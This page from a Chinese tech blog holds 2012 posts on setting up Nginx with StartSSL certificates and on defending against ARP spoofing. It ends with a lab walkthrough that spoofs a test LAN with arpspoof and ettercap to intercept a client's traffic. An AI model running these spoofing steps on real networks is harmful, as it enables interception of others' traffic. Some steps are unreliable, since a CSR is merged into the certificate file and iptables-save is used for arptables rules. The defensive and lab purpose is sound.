海运的博客

Nginx配置StartSSL免费SSL证书

发布时间:August 7, 2012 // 分类:Nginx,OpenSSL // No Comments

证书申请参考:StartSSL免费服务器SSL证书申请,使用自签名证书参考:Nginx配置自签名SSL证书
下载StartSSL根证书并与申请到的StartSSL证书合并到一个文件:

wget http://www.startssl.com/certs/ca.pem
wget http://www.startssl.com/certs/sub.class1.server.ca.pem
cat server.csr sub.class1.server.ca.pem ca.pem > www.haiyun.me.pem

服务器私钥如果有设置密码要清除掉,不然启动Nginx要输入SSL密码。

openssl rsa -in server.key -out www.haiyun.me.key

更改SSL证书权限:

chmod 400 www.haiyun.me.*

修改Nginx配置文件加载SSL证书:

ssl                   on;
ssl_certificate   /path/www.haiyun.me.pem;
ssl_certificate_key /path/www.haiyun.me.key;

修改fcgi配置文件传递HTTPS参数,不然当前网页为HTTPS,下一链接主回到HTTP页面了。

fastcgi_param HTTPS on;

如果网站只允许使用HTTPS连接可添加Header头通知客户端转向HTTPS连接:

add_header Strict-Transport-Security max-age=31536000;

重启Nginx加载:

/etc/init.d/nginx restart

访问www.haiyun.me查看SSL证书:
查看www.haiyun.me证书.png

StartSSL免费权威SSL证书申请图文详解

发布时间:August 7, 2012 // 分类:OpenSSL // No Comments

1.登录StartSSL并注册为用户,此略过。
2.面板添加域名认证,用于申请SSL证书的域名。
startssl添加域名验证.png
3.输入要验证的域名:
startssl填写要验证的域名.png
4.选择要验证的邮箱,用于接收验证码。
startssl选择域名验证邮箱.png
5.输入收到的验证码:
输入收到的startssl验证码.png
6.确认域名验证成功,有效期30天,期间可用于申请SSL证书。
startssl域名验证成功.png
7.申请SSL证书:
startssl新申请web服务器ssl证书.png
8.选择申请SSL证书的域名:
选择申请ssl证书的域名.png
9.输入相应子域名:
startssl子域名ssl证书.png
10.生成私钥,确认后在下步复制框内的内容保存了ssl.key文件,如在本地生成可选择跳过。
startssl私钥生成.png
11.保存证书,复制框内的文本保存为server.csr
12.证书申请完成。
startssl证书申请完成.png

Linux下用arptables防arp攻击

发布时间:August 6, 2012 // 分类:Iptables // No Comments

Linux下网络层防火墙iptables很强大,链路层也有类似的防火墙arptables,可针对arp地址进行限制,防止ARP网关欺骗攻击,再配合静态绑定MAC向网关报告正确的本机MAC地址,有效解决ARP攻击问题。
Centos5安装:

#https://www.haiyun.me
wget http://superb-sea2.dl.sourceforge.net/project/ebtables/arptables/arptables-v0.0.3/arptables-v0.0.3-4.tar.gz
tar zxvf arptables-v0.0.3-4.tar.gz 
cd arptables-v0.0.3-4
make
make install

arptables规则设置:

arptables -F
arptables -P INPUT ACCEPT
#默认策略
arptables -A INPUT --src-ip 192.168.1.1 --src-mac 7A:31:14:42:10:01 -j ACCEPT
#允许本网段特定MAC可进入,且IP与MAC相符
arptables -A INPUT --src-mac ! 74:8E:F8:53:DC:C0 -j DROP
#拒绝非网关MAC
arptables -A INPUT --src-ip ! 192.168.1.1 -j DROP
#拒绝非网关IP

保存规则并开机加载:

iptables-save > /etc/sysconfig/arptables
/etc/init.d/arptables save
chkconfig arptables on

规则保存后重新加载会出错,去除以下文件内-o any字段。

/etc/sysconfig/arptables 

Linux防止ARP欺骗攻击

发布时间:August 6, 2012 // 分类:网络安全 // No Comments

之前有介绍ARP攻击测试查找ARP攻击源,本次记录下如何防止ARP攻击。
1.ARP网关欺骗攻击解决,静态绑定网关MAC与IP

arp -s 192.168.1.1 00:1f:a3:65:55:8d

2.客户端MAC被恶意冒充,安装arpoison持续向网关发送正确的本机MAC地址,以毒攻毒。
Centos下arpoison安装:

yum install libnet libnet-devel
wget http://www.arpoison.net/arpoison-0.6.tar.gz
tar zxvf arpoison-0.6.tar.gz 
cd arpoison
gcc arpoison.c /usr/lib/libnet.so -o arpoison
mv arpoison /usr/bin/

使用参数:

arpoison -d 192.168.1.1 -s 192.168.1.229 -t 00:1F:A3:65:55:8D -r 00:0C:29:E7:CC:3B -w 10
-d #目标IP
-s #源IP
-t #目标MAC
-r #源MAC
-w #发送间隔
-n #发送次数

使用tcpdump监听下看看效果:

 tcpdump arp -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
17:07:34.358289 ARP, Reply 192.168.1.229 is-at 00:0c:29:e7:cc:3b, length 46
17:07:35.359869 ARP, Reply 192.168.1.229 is-at 00:0c:29:e7:cc:3b, length 46
17:07:36.360472 ARP, Reply 192.168.1.229 is-at 00:0c:29:e7:cc:3b, length 46
17:07:37.361108 ARP, Reply 192.168.1.229 is-at 00:0c:29:e7:cc:3b, length 46

使用arping也可实现此功能,不过不能指定目标MAC。

arping -U -I eth0 -s 192.168.1.229 192.168.1.1

Linux下模拟ARP欺骗代理攻击实验

发布时间:August 6, 2012 // 分类:网络安全 // No Comments

有攻才有防,本次测试下ARP欺骗攻击,对防止ARP攻击有更好的了解,请勿用于非法用途。
测试网络环境如下:

路由网关IP:192.168.1.1 MAC:00:1F:A3:65:55:8D  
客户机A IP:192.168.1.3 MAC:00:0c:29:e7:cc:3b 
客户机B IP:192.168.1.5 MAC: 00:0c:29:c6:f8:da

客户机B用作ARP攻击欺骗,发起ARP包欺骗客户机A网关MAC为客户机B网卡MAC:

arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da

客户机B欺骗网关客户机A MAC地址为客户机B MAC:

arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da

或:

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.3/

客户机B开启数据包转发功能:

echo 1 > /proc/sys/net/ipv4/ip_forward

网关tracert客户机A:

traceroute 192.168.1.3
traceroute to 192.168.1.3 (192.168.1.3), 30 hops max, 38 byte packets
 1  192.168.1.5 (192.168.1.5)  1.307 ms  1.750 ms  1.241 ms
 2  192.168.1.3 (192.168.1.3)  2.358 ms !C  7.161 ms !C  1.876 ms !C

客户机A tracert网关:

tracert 192.168.1.1
traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 40 byte packets
 1  192.168.1.5 (192.168.1.5)  2.111 ms  1.962 ms  1.903 ms
 2  192.168.1.1 (192.168.1.1)  1.863 ms  1.753 ms  5.969 ms

看到了吧,真是吭爹呀,都走客户机B代理了。。。。

分类
最新文章
最近回复
  • opnfense: 谢谢博主!!!解决问题了!!!我之前一直以为内置的odhcp6就是唯一管理ipv6的方式
  • liyk: 这个方法获取的IPv6大概20分钟之后就会失效,默认路由先消失,然后Global IPV6再消失
  • 海运: 不好意思,没有。
  • zongboa: 您好,請問一下有immortalwrt設定guest Wi-Fi的GUI教學嗎?感謝您。
  • 海运: 恩山有很多。
  • swsend: 大佬可以分享一下固件吗,谢谢。
  • Jimmy: 方法一 nghtp3步骤需要改成如下才能编译成功: git clone https://git...
  • 海运: 地址格式和udpxy一样,udpxy和msd_lite能用这个就能用。
  • 1: 怎么用 编译后的程序在家里路由器内任意一台设备上运行就可以吗?比如笔记本电脑 m参数是笔记本的...
  • 孤狼: ups_status_set: seems that UPS [BK650M2-CH] is ...